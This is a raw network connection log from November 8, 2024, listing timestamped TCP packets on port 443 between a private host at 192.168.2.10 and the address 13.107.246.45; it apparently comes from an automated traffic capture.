Nov 8, 2024 16:16:07.524240971 CET	443	62025	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:07.569823027 CET	62029	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:07.569869995 CET	443	62029	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:07.569947004 CET	62029	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:07.570301056 CET	62029	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:07.570314884 CET	443	62029	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:07.608833075 CET	443	62026	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:07.623900890 CET	62026	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:07.623939991 CET	443	62026	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:07.624871016 CET	62026	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:07.624877930 CET	443	62026	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:07.642263889 CET	443	62027	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:07.644160986 CET	62027	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:07.644182920 CET	443	62027	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:07.644618988 CET	62027	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:07.644624949 CET	443	62027	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:07.752995968 CET	443	62026	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:07.753083944 CET	443	62026	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:07.753204107 CET	62026	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:07.753324032 CET	62026	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:07.753348112 CET	443	62026	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:07.753364086 CET	62026	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:07.753370047 CET	443	62026	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:07.757000923 CET	62030	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:07.757045984 CET	443	62030	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:07.757242918 CET	62030	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:07.757242918 CET	62030	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:07.757281065 CET	443	62030	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:07.772696018 CET	443	62027	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:07.772727966 CET	443	62027	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:07.772778988 CET	443	62027	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:07.772809982 CET	62027	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:07.772838116 CET	62027	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:07.773015976 CET	62027	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:07.773039103 CET	443	62027	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:07.773052931 CET	62027	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:07.773061037 CET	443	62027	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:07.775549889 CET	62031	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:07.775583982 CET	443	62031	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:07.775650978 CET	62031	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:07.775790930 CET	62031	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:07.775796890 CET	443	62031	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:08.248339891 CET	443	62028	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:08.248907089 CET	62028	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:08.248965979 CET	443	62028	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:08.249375105 CET	62028	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:08.249382973 CET	443	62028	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:08.310978889 CET	443	62029	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:08.311403036 CET	62029	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:08.311431885 CET	443	62029	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:08.311949968 CET	62029	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:08.311958075 CET	443	62029	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:08.398590088 CET	443	62028	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:08.398665905 CET	443	62028	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:08.398730040 CET	62028	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:08.398890018 CET	62028	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:08.398914099 CET	443	62028	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:08.398925066 CET	62028	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:08.398930073 CET	443	62028	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:08.401616096 CET	62032	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:08.401662111 CET	443	62032	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:08.401736975 CET	62032	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:08.401889086 CET	62032	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:08.401904106 CET	443	62032	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:08.442786932 CET	443	62029	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:08.442852974 CET	443	62029	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:08.442899942 CET	62029	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:08.443098068 CET	62029	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:08.443113089 CET	443	62029	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:08.443123102 CET	62029	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:08.443134069 CET	443	62029	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:08.445801020 CET	62033	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:08.445846081 CET	443	62033	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:08.445923090 CET	62033	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:08.446207047 CET	62033	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:08.446217060 CET	443	62033	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:08.478514910 CET	443	62030	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:08.479209900 CET	62030	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:08.479249954 CET	443	62030	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:08.479675055 CET	62030	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:08.479681015 CET	443	62030	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:08.529486895 CET	443	62031	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:08.530018091 CET	62031	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:08.530028105 CET	443	62031	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:08.530458927 CET	62031	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:08.530463934 CET	443	62031	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:08.606323957 CET	443	62030	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:08.606872082 CET	443	62030	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:08.606933117 CET	62030	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:08.606959105 CET	62030	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:08.606980085 CET	443	62030	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:08.606988907 CET	62030	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:08.606996059 CET	443	62030	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:08.609761953 CET	62034	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:08.609817982 CET	443	62034	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:08.609883070 CET	62034	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:08.610099077 CET	62034	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:08.610115051 CET	443	62034	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:08.660446882 CET	443	62031	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:08.660564899 CET	443	62031	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:08.660620928 CET	62031	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:08.660629034 CET	443	62031	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:08.660679102 CET	62031	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:08.660837889 CET	62031	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:08.660856962 CET	443	62031	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:08.660867929 CET	62031	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:08.660875082 CET	443	62031	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:08.663661003 CET	62035	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:08.663708925 CET	443	62035	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:08.663796902 CET	62035	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:08.663961887 CET	62035	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:08.663971901 CET	443	62035	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:09.149861097 CET	443	62032	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:09.150408030 CET	62032	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:09.150428057 CET	443	62032	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:09.150861025 CET	62032	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:09.150866032 CET	443	62032	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:09.194711924 CET	443	62033	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:09.195224047 CET	62033	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:09.195250034 CET	443	62033	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:09.195792913 CET	62033	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:09.195797920 CET	443	62033	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:09.280597925 CET	443	62032	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:09.280673027 CET	443	62032	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:09.280756950 CET	62032	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:09.280909061 CET	62032	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:09.280929089 CET	443	62032	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:09.280950069 CET	62032	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:09.280956984 CET	443	62032	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:09.283740044 CET	62036	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:09.283772945 CET	443	62036	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:09.283859968 CET	62036	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:09.284024954 CET	62036	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:09.284038067 CET	443	62036	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:09.325747967 CET	443	62033	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:09.326176882 CET	443	62033	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:09.326253891 CET	62033	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:09.326307058 CET	62033	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:09.326327085 CET	443	62033	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:09.326359987 CET	62033	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:09.326366901 CET	443	62033	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:09.328794956 CET	62037	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:09.328835964 CET	443	62037	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:09.328912973 CET	62037	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:09.329097986 CET	62037	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:09.329111099 CET	443	62037	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:09.342509031 CET	443	62034	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:09.342906952 CET	62034	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:09.342936039 CET	443	62034	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:09.343348980 CET	62034	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:09.343353987 CET	443	62034	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:09.396358967 CET	443	62035	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:09.396853924 CET	62035	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:09.396888018 CET	443	62035	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:09.397346973 CET	62035	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:09.397352934 CET	443	62035	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:09.473467112 CET	443	62034	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:09.473531008 CET	443	62034	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:09.473582983 CET	62034	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:09.473741055 CET	62034	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:09.473762035 CET	443	62034	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:09.473773956 CET	62034	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:09.473782063 CET	443	62034	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:09.476818085 CET	62038	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:09.476852894 CET	443	62038	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:09.476942062 CET	62038	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:09.477088928 CET	62038	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:09.477099895 CET	443	62038	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:09.524909973 CET	443	62035	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:09.524993896 CET	443	62035	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:09.525042057 CET	62035	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:09.525193930 CET	62035	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:09.525216103 CET	443	62035	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:09.525227070 CET	62035	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:09.525238991 CET	443	62035	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:09.527628899 CET	62039	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:09.527689934 CET	443	62039	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:09.527769089 CET	62039	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:09.527939081 CET	62039	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:09.527954102 CET	443	62039	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:09.782355070 CET	443	62024	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:09.782974005 CET	62024	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:09.782999039 CET	443	62024	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:09.783523083 CET	62024	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:09.783526897 CET	443	62024	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:09.947053909 CET	443	62024	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:09.947123051 CET	443	62024	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:09.947191000 CET	62024	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:09.947419882 CET	62024	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:09.947443962 CET	443	62024	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:09.947455883 CET	62024	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:09.947462082 CET	443	62024	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:09.950081110 CET	62040	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:09.950124025 CET	443	62040	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:09.950196028 CET	62040	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:09.950350046 CET	62040	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:09.950360060 CET	443	62040	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:10.018132925 CET	443	62036	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:10.030628920 CET	62036	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:10.030628920 CET	62036	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:10.030652046 CET	443	62036	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:10.030695915 CET	443	62036	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:10.085606098 CET	443	62037	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:10.130383015 CET	62037	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:10.156975031 CET	443	62036	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:10.157059908 CET	443	62036	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:10.157150030 CET	62036	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:10.181282997 CET	62037	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:10.181293964 CET	443	62037	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:10.182307005 CET	62037	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:10.182310104 CET	443	62037	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:10.211910009 CET	443	62038	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:10.259067059 CET	443	62039	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:10.271014929 CET	62038	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:10.279956102 CET	62036	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:10.279983044 CET	443	62036	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:10.279998064 CET	62036	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:10.280004978 CET	443	62036	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:10.300862074 CET	62039	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:10.308667898 CET	443	62037	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:10.308760881 CET	443	62037	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:10.308880091 CET	62037	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:10.317137957 CET	62038	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:10.317156076 CET	443	62038	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:10.321000099 CET	62038	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:10.321006060 CET	443	62038	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:10.345549107 CET	62039	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:10.345572948 CET	443	62039	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:10.347228050 CET	62039	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:10.347237110 CET	443	62039	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:10.347963095 CET	62037	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:10.347989082 CET	443	62037	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:10.347999096 CET	62037	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:10.348005056 CET	443	62037	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:10.351789951 CET	62041	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:10.351845980 CET	443	62041	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:10.351917982 CET	62041	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:10.352791071 CET	62042	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:10.352838039 CET	443	62042	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:10.352893114 CET	62042	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:10.353185892 CET	62041	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:10.353199959 CET	443	62041	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:10.353357077 CET	62042	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:10.353369951 CET	443	62042	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:10.472781897 CET	443	62039	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:10.472810030 CET	443	62039	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:10.472857952 CET	443	62039	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:10.472896099 CET	62039	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:10.472896099 CET	62039	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:10.474903107 CET	443	62038	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:10.474988937 CET	443	62038	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:10.475033045 CET	62039	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:10.475033045 CET	62039	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:10.475039005 CET	62038	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:10.475056887 CET	443	62039	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:10.475075006 CET	443	62039	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:10.478696108 CET	62038	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:10.478696108 CET	62038	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:10.478712082 CET	443	62038	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:10.478720903 CET	443	62038	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:10.485867977 CET	62043	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:10.485918045 CET	443	62043	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:10.485984087 CET	62043	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:10.486546040 CET	62044	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:10.486587048 CET	443	62044	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:10.486637115 CET	62044	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:10.486821890 CET	62043	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:10.486835957 CET	443	62043	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:10.486994028 CET	62044	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:10.487003088 CET	443	62044	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:10.707904100 CET	443	62040	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:10.708554983 CET	62040	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:10.708581924 CET	443	62040	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:10.709032059 CET	62040	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:10.709038019 CET	443	62040	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:10.845271111 CET	443	62040	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:10.845352888 CET	443	62040	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:10.845421076 CET	62040	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:10.845710993 CET	62040	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:10.845732927 CET	443	62040	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:10.845745087 CET	62040	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:10.845751047 CET	443	62040	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:10.848737001 CET	62045	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:10.848778009 CET	443	62045	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:10.848851919 CET	62045	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:10.849030972 CET	62045	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:10.849044085 CET	443	62045	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:11.081064939 CET	443	62042	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:11.081582069 CET	62042	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:11.081614971 CET	443	62042	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:11.082228899 CET	62042	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:11.082232952 CET	443	62042	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:11.094194889 CET	443	62041	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:11.094644070 CET	62041	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:11.094685078 CET	443	62041	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:11.095073938 CET	62041	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:11.095084906 CET	443	62041	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:11.209467888 CET	443	62042	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:11.209497929 CET	443	62042	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:11.209542990 CET	443	62042	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:11.209590912 CET	62042	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:11.209619045 CET	62042	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:11.209862947 CET	62042	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:11.209883928 CET	443	62042	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:11.209892988 CET	62042	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:11.209897995 CET	443	62042	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:11.212845087 CET	62046	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:11.212883949 CET	443	62046	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:11.212985992 CET	62046	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:11.213146925 CET	62046	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:11.213160992 CET	443	62046	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:11.220709085 CET	443	62044	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:11.221080065 CET	62044	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:11.221095085 CET	443	62044	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:11.221184969 CET	443	62043	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:11.221421003 CET	62043	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:11.221446991 CET	443	62043	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:11.221513033 CET	62044	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:11.221518993 CET	443	62044	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:11.221909046 CET	62043	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:11.221914053 CET	443	62043	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:11.226563931 CET	443	62041	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:11.226633072 CET	443	62041	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:11.226695061 CET	62041	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:11.226788998 CET	62041	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:11.226804972 CET	443	62041	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:11.226816893 CET	62041	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:11.226821899 CET	443	62041	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:11.229135036 CET	62047	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:11.229175091 CET	443	62047	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:11.229249001 CET	62047	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:11.229418039 CET	62047	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:11.229430914 CET	443	62047	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:11.349854946 CET	443	62044	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:11.349884987 CET	443	62044	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:11.349930048 CET	443	62044	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:11.349981070 CET	62044	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:11.350207090 CET	62044	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:16:11.350240946 CET	443	62044	13.107.246.45	192.168.2.10
Nov 8, 2024 16:16:11.350251913 CET	62044	443	192.168.2.10	13.107.246.45
